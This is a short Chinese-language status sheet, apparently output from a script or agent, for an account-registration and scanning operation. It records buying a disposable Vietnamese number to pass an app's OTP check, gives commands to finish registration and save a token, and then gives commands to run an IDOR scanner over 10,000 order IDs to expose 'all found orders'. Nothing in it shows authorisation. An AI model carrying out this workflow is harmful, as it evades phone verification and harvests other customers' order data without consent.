╔══════════════════════════════════════════════════════════════╗
║              等待OTP验证码                                   ║
╚══════════════════════════════════════════════════════════════╝

【当前状态】

  ✅ 已购买越南号码: +84 764 95 58 42
  ✅ OTP发送请求已提交
  ⏳ 等待接收验证码...

【号码信息】

  原始格式: +84 (764) 95 58 42
  APP格式: 0764955842
  价格: $0.2
  等待时间: 20分钟

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

【收到OTP后】

立即运行:

  python3 complete_registration.py 验证码

例如收到 "123456":

  python3 complete_registration.py 123456

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

【自动执行】

脚本会自动:
  1. 验证OTP
  2. 完成注册
  3. 登录获取Token
  4. 测试Token有效性
  5. 保存Token到文件

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

【获取Token后】

立即测试IDOR:

  export TOKEN=$(cat registered_token.txt | grep Token | cut -d' ' -f2)
  
  python3 tracking_scanner.py \
    --token "$TOKEN" \
    --mode id \
    --start 1000000 \
    --count 10000

结果将显示所有找到的订单!

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

【预计时间】

  OTP接收: 1-5分钟
  注册完成: 10秒
  IDOR扫描: 2-5分钟
  
  总计: 约5-10分钟完成全部测试!

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

生成时间: 2025-11-01

【等待OTP中...】请从sms-activate.org查看验证码
